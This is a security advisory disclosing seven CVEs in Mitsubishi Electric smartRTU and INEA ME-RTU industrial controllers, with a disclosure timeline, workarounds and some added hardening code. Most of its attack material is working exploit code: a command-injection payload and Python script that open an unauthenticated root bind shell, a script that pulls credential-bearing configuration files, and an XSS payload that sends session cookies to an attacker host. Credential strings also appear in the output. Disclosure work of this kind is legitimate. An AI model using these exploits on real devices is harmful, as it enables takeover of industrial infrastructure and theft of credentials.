(CVE-2019-14925 –> CVE-2019-14931) Mitsubishi Electric & INEA RTU Multiple Vulnerabilities
#-------------------------------------------------------
# Multiple Vulnerabilities
# Mitsubishi Electric smartRTU & INEA ME-RTU
# Working exploits: Yes
# Public Disclosure Date: 13 August 2019
# CVE-IDs: CVE-2019-14925 -> CVE-2019-14931 (7 CVE-IDs)
# Author: Mark Cross (@xerubus | mogozobo.com)
#-------------------------------------------------------
====================
Summary
====================
Product: Mitsubishi Electric smartRTU & INEA ME-RTU
Version: Latest version of firmware (Mitsubishi Electric 2.02 & INEA 3.0) and prior
Vendor: Mitsubishi Electric / INEA
CVE-IDs: CVE-2019-14925 -> CVE-2019-14931 (7 CVE-IDs)
Mitsubishi Electric’s smartRTU “addresses requirements for 100% reliable remote surveillance and control of distributed assets, even in extreme climates. With powerful functions like diagnostics, alarm and event-storage and time trend data buffering, it meets the challenges of managing massively distributed assets such as data security, interfacing issues, data continuity and reliable communications. Mitsubishi Electric‘s smartRTU combines the needs of a large number of industries into a single device that is simpler than conventional RTUs, yet provides powerful capabilities that can be easily deployed and administered, even by staff with low skill levels. The smartRTU is scalable from a handful of sites to many hundreds with remote configuration management.”
Further information can be found at the following URLs:
The following vulnerabilities have been discovered in Mitsubishi Electric’s smartRTU running firmware version 2.02 and INEA’s ME-RTU running firmware version 3.0:
- Unauthenticated OS Command Injection (CVE-2019-14931)
- Unauthenticated Download of Configuration File (CVE-2019-14927)
- Stored Cross-site Script (XSS) (CVE-2019-14928)
- Use of Hard-coded Cryptographic Keys (CVE-2019-14926)
- Hard-coded User Passwords (CVE-2019-14930)
- Plaintext Password Storage (CVE-2019-14929)
- World-readable Configuration File (CVE-2019-14925)
It is important to note that Mitsubishi Electric and INEA were unable to provide mitigations for the identified vulnerabilities during the 45 day disclosure period. If you currently utilise Mitsubishi Electric smartRTU’s or INEA ME-RTU’s in your environment, consider the following workarounds:
- Ensure the RTUs have appropriate controls to protect the devices from unauthorized network access;
- Ensure the RTUs are not exposed or accessible from the Internet;
- Ensure the RTUs are not exposed or accessible from corporate or other untrusted networks;
- Initiate change control and test processes once patches are released by the vendor. If unable to patch, ensure appropriate controls and logging capability are in place for vulnerable devices.
====================
Disclosure Timeline
====================
27 June 2019
– Vulnerabilities discovered. Further testing commenced.
29 June 2019
– I disclosed vulnerabilities to ICS-CERT <ics-cert@hq.dhs.gov> via PGP encrypted email. Receipt of email requested.
– 45 day disclosure time advised and commenced (13 August 2019).
30 June 2019
– I disclosed to ICS-CERT <ics-cert@hq.dhs.gov> via PGP encrypted email that INEA’s firmware version 3.0 is also affected by the same vulnerabilities.
03 July 2019
– I re-sent disclosure to ICS-CERT <ics-cert@hq.dhs.gov> requesting a response that they have received the details. Advised that I will be going to full disclosure should no response occur.
04 July 2019
– GRP-CSOC <csoc@inl.gov> emailed advising ticket ICS-VU-016907 has been assigned to this case.
16 July 2019
– GRP-CSOC <csoc@inl.gov> emailed advising that contact was established with the vendor and the report was sent to them.
23 July 2019
– I requested an update due to disclosure date getting close.
– GRP-CSOC <csoc@inl.gov> advised they have requested an update from the vendor.
07 August 2019
– GRP-CSOC <csoc@inl.gov> advised that Mitsubishi have requested an extension to the disclosure date.
– I advised that it has been 37 days since the original disclosure and full disclosure is set for 6 days' time; it is unreasonable to be requesting an extension to the disclosure period so late in the process. I will be disclosing these vulnerabilities on 13/08/19 (AEST) as originally advised.
– GRP-CSOC <csoc@inl.gov> advised they will issue an alert on the disclosure date.
– I provided GRP-CSOC with risk mitigation steps for their alert.
10 August 2019
– GRP-CSOC <csoc@inl.gov> advised that I will need to seek CVE-IDs from Mitre.
– GRP-CSOC <csoc@inl.gov> provided a draft alert for comment.
– I requested CVE-IDs from Mitre.
11 August 2019
– Mitre assigned CVE-2019-14925 -> CVE-2019-14931 (7 CVE-IDs).
– I submitted exploits to exploit-db.
13 August 2019
– Public disclosure
#-----------------------------------------------------------------------------------
# 1. Unauthenticated OS Command Injection
# CVE-ID: CVE-2019-14931
# CWE-ID: CWE-78: Improper Neutralisation of Special Elements used in an OS Command
# Exploit-DB ID: https://www.exploit-db.com/exploits/47235
#-----------------------------------------------------------------------------------
====================
Tested versions / Platform
====================
Mitsubishi Electric’s ME-RTU firmware version 2.02 and INEA’s ME-RTU running firmware version 3.0
====================
Details
====================
An unauthenticated remote OS Command Injection vulnerability in Mitsubishi Electric’s smartRTU and INEA’s ME-RTU allows an attacker to execute arbitrary commands on the RTU due to the passing of unsafe user supplied data to the RTU’s system shell. Functionality in the mobile.php page provides users with the ability to ping sites or IP addresses via the ‘Mobile Connection Test’. An attacker can use a shell command separator (;) in the ‘host’ variable to execute operating system commands upon submitting the test data.
When the Mobile Connection Test is submitted, action.php is called to execute the test. The following is the contents of the action.php script:
<script>
var RESULTS = top.document.getElementById( "results" );
RESULTS.innerHTML = '<?php
$www = "www.inea.si";
if (isset($_POST["host"]))
    $www = $_POST["host"];
$command="sudo /bin/ping -I ppp0 -c1 -w1 ".$www;
exec($command, $response);
$pos = false;
if (isset($response[4]))
    $pos = strpos($response[4], "1 received");
if ($pos === false) {
    echo "Connection failed";
} else {
    echo "Connection OK!";
}
?>';
</script>
Due to improper input sanitising, it is possible for an attacker to inject an operating system command into the $command variable by appending a shell command separator to the host variable. As an example, the host variable could contain the following string: "www.inea.si;ping 127.0.0.1", which would execute the legitimate ping check against the host www.inea.si as well as execute a second unauthorised ping to localhost.
The www-data user is configured with a limited set of commands which may be executed with root privileges via sudoers. The sudo permissions are stored in the /etc/sudoers.d/viswww file. The following shows the commands able to be executed with sudo capability:
www-data ALL=NOPASSWD: /usr/bin/BFMDebug
www-data ALL=NOPASSWD: /bin/ping
www-data ALL=NOPASSWD: /usr/bin/SettingsChange
www-data ALL=NOPASSWD: /usr/bin/GprsStatus
www-data ALL=NOPASSWD: /usr/bin/openssl
www-data ALL=NOPASSWD: /sbin/ifconfig
www-data ALL=NOPASSWD: /sbin/iptables
www-data ALL=NOPASSWD: /usr/bin/IECMasterSettings
www-data ALL=NOPASSWD: /etc/init.d/rtudb
www-data ALL=NOPASSWD: /usr/smartrtu/prepareSD.sh
www-data ALL=NOPASSWD: /usr/smartrtu/change-passwd.sh
www-data ALL=NOPASSWD: /bin/chgrp
www-data ALL=NOPASSWD: /bin/chmod
www-data ALL=NOPASSWD: /usr/sbin/service
www-data ALL=NOPASSWD: /sbin/ifdown
www-data ALL=NOPASSWD: /sbin/ifup
Whilst the commands which can be executed with root privileges are quite limited, it is possible to abuse the /usr/sbin/service binary to run any OS command with sudo-granted root privileges, because service resolves the supplied service name relative to /etc/init.d/ without rejecting path traversal. By utilising the privileged context of the ‘service’ binary, it is possible to create a root bind shell via netcat on the RTU by injecting the following string into the $host variable:
;sudo /usr/sbin/service ../../bin/nc -nvlp 1337 -e /bin/sh
The following snippet shows the bind shell being executed as root on the RTU:
root@smartrtu:~# ps aux | grep "[1]337"
www-data  4939  0.0  0.0   1480   416 ?   S   07:31   0:00 sh -c sudo /bin/ping -I ppp0 -c1 -w1 ;sudo /usr/sbin/service ../../bin/nc -nvlp 1337 -e /bin/sh
root      4954  0.6  0.2   4604  2396 ?   S   07:31   0:00 sudo /usr/sbin/service ../../bin/nc -nvlp 1337 -e /bin/sh
root      4961  0.3  0.1   1536  1140 ?   S   07:31   0:00 /etc/init.d/../../bin/nc -nvlp 1337 -e /bin/sh
root@smartrtu:~#
The following snippet shows the successful bind shell from the remote attacking host:
attacker > nc 192.168.7.70 1337
id;whoami;hostname
uid=0(root) gid=0(root) groups=0(root)
root
smartrtu
Due to the lack of session checking, it is possible for an attacker to perform the same attack as above from an unauthenticated posture by simply supplying the malicious payload directly to the ‘action.php’ page. The following is a simple curl command which can be run from the attacking host:
curl -i -s -k -X $'POST' -H $'Host: 192.168.7.70' --data-binary $'host=%3Bsudo+%2Fusr%2Fsbin%2Fservice+..%2F..%2Fbin%2Fnc+-nvlp+1337+-e+%2Fbin%2Fsh&PingCheck=Test' $'http://192.168.7.70/action.php'
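The following is a hardened rewrite of the action.php handler, added here as an example and not taken from the vendor's firmware. It assumes the web interface keeps a logged-in flag in $_SESSION['authenticated'] (a hypothetical name) and that /bin/ping can be run by www-data without sudo (setuid or CAP_NET_RAW); the same session check is the control missing from saveSettings.php.

```php
<?php
// Hardened Mobile Connection Test handler (added example, not the vendor's code).
// Assumes $_SESSION['authenticated'] (hypothetical name) is set at login and that
// /bin/ping is runnable by www-data without sudo.
session_start();

// 1. Session check: the original action.php could be called unauthenticated.
if (empty($_SESSION['authenticated'])) {
    http_response_code(403);
    exit('Not authenticated');
}

/**
 * Accept only a literal IPv4/IPv6 address or a syntactically valid hostname.
 * Returns null for anything else, so ';', '|', '$(' and a leading '-' (which
 * ping would treat as an option) never reach the shell or the binary.
 */
function validate_ping_target(string $input): ?string
{
    $input = trim($input);
    if (filter_var($input, FILTER_VALIDATE_IP) !== false) {
        return $input;
    }
    if (strlen($input) <= 253
        && filter_var($input, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) !== false) {
        return $input;
    }
    return null;
}

$target = validate_ping_target($_POST['host'] ?? 'www.inea.si');
if ($target === null) {
    http_response_code(400);
    exit('Invalid host');
}

// 2. Never build the command by string concatenation. escapeshellarg() is
//    defence in depth on top of the allow-list, and ping runs without sudo so a
//    validation bypass would not hand out root.
$command = sprintf('/bin/ping -I ppp0 -c1 -w1 %s 2>&1', escapeshellarg($target));
exec($command, $response, $exit_code);

// 3. Use ping's exit status rather than parsing a particular output line.
$message = ($exit_code === 0) ? 'Connection OK!' : 'Connection failed';

// 4. Return JSON instead of writing the result into a <script> block via
//    innerHTML, so the response cannot become an HTML or JS injection vector.
header('Content-Type: application/json');
echo json_encode(['result' => $message]);
```

Nothing in this handler runs via sudo, so the corresponding /etc/sudoers.d/viswww entries, in particular /usr/sbin/service, can be removed at the same time.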
====================
Exploit difficulty
====================
It is possible for an attacker to perform the command injection from both an authenticated and unauthenticated perspective. An attacker who successfully exploits the vulnerability can execute arbitrary code on the target system with the same privilege rights and context of the user running the process.
====================
Proof of Concept
====================
The following snippet shows the proof of concept code being executed to obtain a bind shell with root privileges on the vulnerable smartRTU:
   _   _ ___
  (~ )( ~) / \_\ \/ /
 | D_ ]\ \/      -= Bind_Me-smartRTU by @xerubus =-
 | D _]/\ \      -= We all have something to hide =-
  \___/ / /\ \
  (_ )( _)  @Xerubus

Enter RTU IP address: 192.168.7.70
Enter bind shell port number: 1337

[+] Building payload
[+] Sending payload
[+] Attempting connection to smartRTU
[+] Connected to the smartRTU!

(smartRTU-shell) # id
uid=0(root) gid=0(root) groups=0(root)
(smartRTU-shell) # hostname
smartrtu
(smartRTU-shell) # exit

[!] Play nice now skiddies....
The following proof of concept (POC) code will be submitted to exploit-db at the end of the 45 day disclosure period.
#!/usr/bin/python
# Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated OS Command Injection
# Date: 29 June 2019
# Exploit Author: (@xerubus | mogozobo.com)
# Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local
# Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/
# Firmware Version: Mitsubishi Electric 2.02 & INEA 3.0
# CVE-ID: CVE-2019-14931
# Full write-up: https://www.mogozobo.com/?p=3593

import sys, os, requests, socket

os.system('clear')

print("""\
   _   _ ___
  (~ )( ~) / \_\ \/ /
 | D_ ]\ \/      -= Bind_Me-smartRTU by @xerubus =-
 | D _]/\ \      -= We all have something to hide =-
  \___/ / /\ \\
  (_ )( _)  @Xerubus
""")

host = raw_input("Enter RTU IP address: ")
port = raw_input("Enter bind shell port number: ")

php_page = '/action.php'
url = "http://{}{}".format(host, php_page)
payload = {'host' : ';sudo /usr/sbin/service ../../bin/nc -nvlp '+port+' -e /bin/sh&PingCheck=Test'}

print "\n[+] Building payload"
print "[+] Sending payload"
print "[+] Attempting connection to smartRTU"

try:
    r = requests.post(url, data=payload, timeout=1)
except:
    pass

port = (int(port))

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    try :
        print "[+] Connected to the smartRTU!\n"
        while 1:
            cmd = raw_input("(smartRTU-shell) # ");
            s.send(cmd + "\n");
            result = s.recv(1024).strip();
            if not len(result) :
                print "\n[!] Play nice now skiddies....\n\n"
                s.close();
                break;
            print(result);
    except KeyboardInterrupt:
        print "\n[+] ^C Received, closing connection"
        s.close();
    except EOFError:
        print "\n[+] ^D Received, closing connection"
        s.close();
except socket.error:
    print "[!] Failed to connect to bind shell."
#------------------------------------------------------
# 2. Unauthenticated Download of Configuration File
# CVE-ID: CVE-2019-14927
# CWE-ID: CWE-284: Improper Access Control
# Exploit-DB ID: https://www.exploit-db.com/exploits/47234
#------------------------------------------------------
====================
Tested versions / Platform
====================
Mitsubishi Electric ME-RTU firmware version 2.02 and INEA’s ME-RTU running firmware version 3.0
====================
Details
====================
It is possible to download the Mitsubishi Electric smartRTU’s and the INEA ME-RTU’s configuration file from an unauthenticated posture due to a vulnerability in the web-based management interface of the RTU. Improper access controls for URLs allow the bypass of authentication controls, resulting in the unauthenticated download of the configuration file which contains data such as usernames, passwords, and other sensitive RTU data.
The following is a simple curl command which can be executed from the attacking host to obtain the smartRTU configuration file:
> curl -i -s -k http://192.168.7.70/saveSettings.php
The following snippet shows the response of the above curl command while searching for Username or Password strings:
> curl -i -s -k http://192.168.7.70/saveSettings.php | grep -i 'username\|password'
<MobilePAPUsername>field_rtu_a34</MobilePAPUsername>
<MobilePAPPassword>*T44Zkl.90</MobilePAPPassword>
<MobileCHAPUsername>default</MobileCHAPUsername>
<MobileCHAPPassword>default</MobileCHAPPassword>
<DDNSUserName>User-redacted</DDNSUserName>
<DDNSPassword>*Fn]mwA\vVrL#</DDNSPassword>
<OpenVPNUsername>field_rtu_a34</OpenVPNUsername>
<OpenVPNPassword>*T44Zkl.90</OpenVPNPassword>
====================
Exploit difficulty
====================
An attacker can download the RTU configuration file from an unauthenticated perspective by requesting the URL from the affected device via a plain HTTP request.
====================
Proof of Concept
====================
The following snippet shows the proof of concept code being executed to download the configuration file from the vulnerable smartRTU:
   _   _ ___
  (~ )( ~) / \_\ \/ /
 | D_ ]\ \/      -= Conf_Me-smartRTU by @xerubus =-
 | D _]/\ \      -= We all have something to hide =-
  \___/ / /\ \
  (_ )( _)  @Xerubus

Enter RTU IP address: 192.168.7.70
[+] Attempting to download smartRTU configuration file
[+] Successfully obtained smartRTU configuration file.. saving to smartRTU_conf.xml

> grep -i 'username\|password' smartRTU_conf.xml
<MobilePAPUsername>field_rtu_a34</MobilePAPUsername>
<MobilePAPPassword>*\yl~~v^uHZh|eA##</MobilePAPPassword>
<MobileCHAPUsername>default</MobileCHAPUsername>
<MobileCHAPPassword>default</MobileCHAPPassword>
<DDNSUserName>user-redacted</DDNSUserName>
<DDNSPassword>*\qKhUi[pcR]m#j[xUA##</DDNSPassword>
<OpenVPNUsername>field_rtu_a34</OpenVPNUsername>
<OpenVPNPassword>*\yl~~v^uHZh|eA##</OpenVPNPassword>
The following proof of concept (POC) code will be submitted to exploit-db at the end of the 45 day disclosure period.
#!/usr/bin/python
# Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated Configuration Download
# Date: 29 June 2019
# Exploit Author: (@xerubus | mogozobo.com)
# Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local
# Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/
# Firmware Version: Mitsubishi Electric 2.02 & INEA 3.0
# CVE-ID: CVE-2019-14927
# Full write-up: https://www.mogozobo.com/?p=3593

import sys, os, requests, socket

os.system('clear')

print("""\
   _   _ ___
  (~ )( ~) / \_\ \/ /
 | D_ ]\ \/      -= Conf_Me-smartRTU by @xerubus =-
 | D _]/\ \      -= We all have something to hide =-
  \___/ / /\ \\
  (_ )( _)  @Xerubus
""")

host = raw_input("Enter RTU IP address: ")

php_page = '/saveSettings.php'
url = "http://{}{}".format(host, php_page)

print "[+] Attempting to download smartRTU configuration file"
r = requests.get(url)

if r.status_code == 200:
    print "[+] Successfully obtained smartRTU configuration file.. saving to smartRTU_conf.xml\n"
    with open('smartRTU_conf.xml', 'w') as f:
        f.write(r.content)
#-------------------------------------------------------------------
# 3. Stored Cross-site Script (XSS)
# CVE-ID: CVE-2019-14928
# CWE-ID: CWE-79: Improper Neutralisation of user supplied input
#-------------------------------------------------------------------
====================
Tested versions / Platform
====================
Mitsubishi Electric ME-RTU firmware version 2.02 and INEA’s ME-RTU running firmware version 3.0
====================
Details
====================
A number of stored XSS vulnerabilities have been identified in Mitsubishi Electric’s smartRTU and INEA’s ME-RTU web configuration software which could allow an authenticated threat actor to inject malicious code directly into the application.
An example input variable vulnerable to stored XSS exists in the ‘index.php’ page:
<td class="m"><input type="text" name="SerialInitialModemString" size="34" value="XSS code goes here"></td>
An attacker can replace the string ‘XSS code goes here’ with "/><script>alert("xss")</script> in order to exploit the stored XSS vulnerability, resulting in an alert box with the message ‘xss’ being displayed whenever a user visits the ‘index.php’ page.
====================
Exploit difficulty
====================
It is possible for an attacker to inject malicious code from an authenticated perspective only. An attacker who successfully exploits the XSS vulnerabilities can run arbitrary client-side script in the browser of any user who views the affected page.
====================
Proof of Concept
====================
The following snippet shows the proof of concept code being executed to obtain a logged on user’s session ID and send the session ID to the attackers host in order to perform a session replay based attack to bypass username/password authentication methods on the vulnerable smartRTU:
"/><script>location.href="http://attackers-ipaddr/cookiemonster.php?cookiemonster="+document.cookie;</script>
In order to receive the session cookie details from the targeted user, the following php script needs to be available on the attacker's host:
#cookiemonster.php
<?php
$cookie = isset($_GET["cookiemonster"])?$_GET['cookiemonster']:"";
?>
The following snippet shows the attacking host successfully receiving the session cookie from the logged in user on the smartRTU web interface. By replaying the session token, it is possible for the attacker to bypass username/password requirements and access the web interface as the victim user.
192.168.7.67 - - [29/Jun/2019 12:45:12] "GET /cookiemonster.php?cookiemonster=PHPSESSID=qgod127cgop3plndmbnq86qjv0 HTTP/1.1" 200 -
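The following shows the index.php input field rendered with and without output encoding, together with the session-cookie settings that blunt the cookie theft in the proof of concept above. It is an added example, not the vendor's code; the $settings array is a constructed stand-in for the values the page reads from the stored configuration.

```php
<?php
// Added example (not the vendor's code): rendering the SerialInitialModemString
// setting on index.php. $settings is a constructed stand-in for the values the
// page reads from the stored configuration; the value is the advisory's payload.
$settings = ['SerialInitialModemString' => '"/><script>alert("xss")</script>'];

// Vulnerable form: the stored value is written raw into a double-quoted
// attribute, so '"/>' terminates the <input> and the <script> that follows
// runs for every user who opens index.php.
function render_vulnerable(array $settings): string
{
    return '<td class="m"><input type="text" name="SerialInitialModemString" size="34" value="'
        . $settings['SerialInitialModemString'] . '"></td>';
}

// Hardened form: encode for the HTML attribute context. ENT_QUOTES converts
// both quote characters to entities, so the attribute cannot be closed early,
// and '<' / '>' become &lt; / &gt; so no tag can be opened from the value.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_hardened(array $settings): string
{
    return '<td class="m"><input type="text" name="SerialInitialModemString" size="34" value="'
        . h($settings['SerialInitialModemString']) . '"></td>';
}

// Input-side allow-list as defence in depth: a modem init string is an AT
// command, so restrict it to printable ASCII without HTML metacharacters and
// a sane length before it is stored in the configuration.
function valid_modem_init_string(string $value): bool
{
    return strlen($value) <= 128
        && preg_match('/^[\x20-\x7E]*$/', $value) === 1
        && strpbrk($value, '<>"\'') === false;
}

// Session-cookie hardening against the cookie-stealing PoC: with HttpOnly set,
// document.cookie no longer exposes PHPSESSID. These belong before
// session_start() in the interface's bootstrap (cookie_samesite needs PHP 7.3+).
ini_set('session.cookie_httponly', '1');
ini_set('session.cookie_samesite', 'Strict');

echo render_vulnerable($settings), PHP_EOL;
echo render_hardened($settings), PHP_EOL;
var_dump(valid_modem_init_string($settings['SerialInitialModemString']));
```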
#----------------------------------------------------
# 4. Use of Hard-coded Cryptographic Keys
# CVE-ID: CVE-2019-14926
# CWE-ID: CWE-798: Use of Hard-coded Credentials
#----------------------------------------------------
====================
Tested versions / Platform
====================
Mitsubishi Electric ME-RTU firmware version 2.02 and INEA’s ME-RTU running firmware version 3.0
====================
Details
====================
Hard-coded SSH host keys have been identified in Mitsubishi Electric’s smartRTU and INEA’s ME-RTU firmware. As the keys cannot be regenerated by a user, and are not regenerated on firmware updates, all deployed Mitsubishi Electric smartRTUs and INEA ME-RTUs share the same SSH host keys.
====================
Exploit difficulty
====================
An attacker may leverage this vulnerability by copying the SSH keys directly from the smartRTU device or from the firmware available for download on Mitsubishi Electric’s and INEA’s web site.
====================
SSH Key Details
====================
The hard-coded RSA private key is stored in /etc/ssh/ssh_host_rsa_key on the RTU.
The hard-coded EC private key is stored in /etc/ssh/ssh_host_ecdsa_key on the RTU.
The hard-coded DSA private key is stored in /etc/ssh/ssh_host_dsa_key on the RTU.
#---------------------------------------------------
# 5. Hard-coded User Passwords
# CVE-ID: CVE-2019-14930
# CWE-ID: CWE-798: Use of Hard-coded Credentials
#---------------------------------------------------
====================
Tested versions / Platform
====================
Mitsubishi Electric ME-RTU firmware version 2.02 and INEA’s ME-RTU running firmware version 3.0
====================
Details
====================
Mitsubishi Electric’s smartRTU and INEA’s ME-RTU devices contain undocumented user accounts with hard-coded password credentials. An attack could exploit this vulnerability by using the accounts to log into affected RTU’s. The following user accounts contain hard-coded passwords:
- root
- ineaadmin
- mitsadmin
- maint
- rtuadmin
====================
Exploit difficulty
====================
An attacker with access to the smartRTU’s operating system, or to the firmware downloadable from Mitsubishi Electric’s and INEA’s websites, can obtain the password hashes from /etc/shadow and crack the passwords with tools such as hashcat or John the Ripper.
As the ineaadmin and mitsadmin user accounts are members of the ‘admin’ group on the RTU, they are able to elevate to root privileges, because the admin group is granted full root access via sudo without the need to supply a password. The following snippet from /etc/group shows the accounts in the admin group on the RTU:
admin:x:1001:ineaadmin,mitsadmin
The following snippet from /etc/sudoers shows the admin group is given full root privileges without password authentication:
# Members of the admin group may gain root privileges
%admin ALL = (ALL) NOPASSWD: ALL
#------------------------------------------------------
# 6. Plaintext Password Storage
# CVE-ID: CVE-2019-14929
# CWE-ID: CWE-255: Credentials Management
#------------------------------------------------------
====================
Tested versions / Platform
====================
Mitsubishi Electric ME-RTU firmware version 2.02 and INEA’s ME-RTU running firmware version 3.0
====================
Details
====================
Mitsubishi Electric’s smartRTU and INEA’s ME-RTU store password credentials in plain text in a configuration file. An unauthenticated user can obtain the exposed password credentials to gain access to the following services:
– DDNS service
– Mobile Network Provider
– OpenVPN service
====================
Exploit difficulty
====================
It is possible to download the smartRTU’s configuration file from an unauthenticated posture due to a vulnerability in the web-based management interface of the RTU. Improper access controls for URLs allow the bypass of authentication controls, resulting in the unauthenticated download of the configuration file which contains data such as usernames, passwords, and other sensitive RTU data.
====================
Proof of Concept
====================
The following snippet from the XML configuration file shows the plaintext password strings:
> curl -i -s -k http://192.168.7.70/saveSettings.php | grep -i 'username\|password'
<MobilePAPUsername>field_rtu_a34</MobilePAPUsername>
<MobilePAPPassword>*T44Zkl.90</MobilePAPPassword>
<MobileCHAPUsername>default</MobileCHAPUsername>
<MobileCHAPPassword>default</MobileCHAPPassword>
<DDNSUserName>User-redacted</DDNSUserName>
<DDNSPassword>*Fn]mwA\vVrL#</DDNSPassword>
<OpenVPNUsername>field_rtu_a34</OpenVPNUsername>
<OpenVPNPassword>*T44Zkl.90</OpenVPNPassword>
#-------------------------------------------------------
# 7. World-readable Configuration File
# CVE-ID: CVE-2019-14925
# CWE-ID: CWE-276: Incorrect Default Permissions
#-------------------------------------------------------
====================
Tested versions / Platform
====================
Mitsubishi Electric ME-RTU firmware version 2.02 and INEA’s ME-RTU running firmware version 3.0
====================
Details
====================
Mitsubishi Electric’s smartRTU and INEA’s ME-RTU store and read configuration settings from a file located at /usr/smartrtu/ini/settings.xml. This file has insecure world-readable permissions assigned, allowing all users on the system to read the configuration file, which contains username and plain text password combinations as well as other sensitive configuration information of the RTU.
The following shows the permissions assigned to the settings.xml file on the smartRTU:
smartrtu > ls -al usr/smartrtu/init/settings.xml
-rw-rw-r-- 1 root root 11537 Jul 23 2015 usr/smartrtu/init/settings.xml
====================
Exploit difficulty
====================
It is possible for any user logged on to the Mitsubishi Electric smartRTU or INEA ME-RTU to read the contents of the settings.xml file due to the world-readable permission assignment.